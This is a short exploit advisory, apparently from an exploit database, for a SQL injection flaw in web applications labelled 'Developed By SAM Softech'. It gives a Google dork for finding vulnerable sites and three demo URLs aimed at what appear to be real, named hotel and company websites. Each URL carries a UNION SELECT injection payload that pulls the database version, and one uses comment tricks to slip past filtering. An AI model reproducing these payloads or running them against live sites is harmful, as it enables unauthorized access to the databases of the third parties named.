*********************************************************
#Exploit Title: SAM Softech Sql Injection Vulnerability
#Date: 2021-08-16
#Exploit Author: Behrouz Mansoori
#Google Dork: "Developed By SAM Softech"
#Category:webapps
#Tested On: windows 10, Firefox
Proof of Concept:
Search google Dork: "Developed By SAM Softech"
### Demo :
http://theavrhotel.com/room.php?id=-3%27%20union%20select%201,version(),3,4,5,6,7,8--+
https://www.hotelorangeinnpatna.com/room.php?id=-1%27%20/*!50000union*/%20/*!50000select*/%201,version(),3,4,5--+
https://www.jyotigroup.co.in/railway-track.php?id=-43%20union%20select%201,version(),3,4,5--
*********************************************************
#Discovered by: Behrouz mansoori
#Instagram: Behrouz_mansoori
#Email: mr.mansoori@yahoo.com
*********************************************************